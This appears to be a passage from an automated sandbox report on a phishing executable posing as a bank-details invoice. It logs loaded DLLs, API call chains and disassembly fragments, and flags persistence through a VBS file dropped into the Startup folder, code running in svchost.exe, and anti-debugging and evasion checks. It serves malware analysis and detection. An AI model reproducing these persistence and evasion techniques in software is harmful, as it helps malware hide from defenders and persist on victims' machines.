                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: confirm bank details invoice.exeStatic file information: File size 1214464 > 1048576
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: confirm bank details invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: confirm bank details invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: confirm bank details invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: confirm bank details invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: confirm bank details invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: confirm bank details invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048E01E LoadLibraryA,GetProcAddress,0_2_0048E01E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00496B05 push ecx; ret 0_2_00496B18
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D46B05 push ecx; ret 2_2_00D46B18
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401851 push ecx; ret 3_2_00401AA4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004160C1 push C69D204Dh; iretd 3_2_004160DC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D95B push ss; retf 3_2_0040D9DD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403160 push eax; ret 3_2_00403162
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416966 push esi; iretd 3_2_0041697A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D904 push FFFFFFF7h; ret 3_2_0040D916
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401A0A push ecx; ret 3_2_00401AA4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040835A push 834BB120h; ret 3_2_00408364
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411B88 push 00000011h; retf 3_2_00411B8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041EBB4 push 94AB5028h; iretd 3_2_0041EBDE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041EC11 push edx; ret 3_2_0041EC12
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00414CE5 push ds; ret 3_2_00414CE6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D620 push esi; ret 3_2_0040D621
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036309AD push ecx; mov dword ptr [esp], ecx3_2_036309B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0360135F push eax; iretd 3_2_03601369
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeFile created: C:\Users\user\AppData\Local\Vevina\deblaterate.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbsJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004D8111
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0048EB42
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D88111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00D88111
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D3EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00D3EB42
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0049123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0049123A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeAPI/Special instruction interceptor: Address: 18E24BC
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeAPI/Special instruction interceptor: Address: 1178CCC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0367096E rdtsc 3_2_0367096E
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeEvaded block: after key decisiongraph_0-93825
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeEvaded block: after key decision
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94605
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeAPI coverage: 4.7 %
                  Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2408Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4092Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004B6CA9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004B60DD
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004B63F9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004BEB60
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BF56F FindFirstFileW,FindClose,0_2_004BF56F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004BF5FA
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C1B2F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C1C8A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004C1F94
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6F56F FindFirstFileW,FindClose,2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D71F94
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0048DDC0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeAPI call chain: ExitProcess graph end nodegraph_0-93404
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0367096E rdtsc 3_2_0367096E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417B73 LdrLoadDll,3_2_00417B73
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C6AAF BlockInput,0_2_004C6AAF
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00473D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00473D19
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_004A3920
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048E01E LoadLibraryA,GetProcAddress,0_2_0048E01E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_01343218 mov eax, dword ptr fs:[00000030h]0_2_01343218
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_01343278 mov eax, dword ptr fs:[00000030h]0_2_01343278
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_01341BB8 mov eax, dword ptr fs:[00000030h]0_2_01341BB8
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_018E10C8 mov eax, dword ptr fs:[00000030h]2_2_018E10C8
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_018E2788 mov eax, dword ptr fs:[00000030h]2_2_018E2788
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_018E2728 mov eax, dword ptr fs:[00000030h]2_2_018E2728
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D437C mov eax, dword ptr fs:[00000030h]3_2_036D437C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B2349 mov eax, dword ptr fs:[00000030h]3_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B035C mov eax, dword ptr fs:[00000030h]3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B035C mov eax, dword ptr fs:[00000030h]3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B035C mov eax, dword ptr fs:[00000030h]3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B035C mov ecx, dword ptr fs:[00000030h]3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B035C mov eax, dword ptr fs:[00000030h]3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B035C mov eax, dword ptr fs:[00000030h]3_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036FA352 mov eax, dword ptr fs:[00000030h]3_2_036FA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D8350 mov ecx, dword ptr fs:[00000030h]3_2_036D8350
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0370634F mov eax, dword ptr fs:[00000030h]3_2_0370634F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03708324 mov eax, dword ptr fs:[00000030h]3_2_03708324
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03708324 mov ecx, dword ptr fs:[00000030h]3_2_03708324
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03708324 mov eax, dword ptr fs:[00000030h]3_2_03708324
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03708324 mov eax, dword ptr fs:[00000030h]3_2_03708324
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A30B mov eax, dword ptr fs:[00000030h]3_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A30B mov eax, dword ptr fs:[00000030h]3_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A30B mov eax, dword ptr fs:[00000030h]3_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C310 mov ecx, dword ptr fs:[00000030h]3_2_0362C310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03650310 mov ecx, dword ptr fs:[00000030h]3_2_03650310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
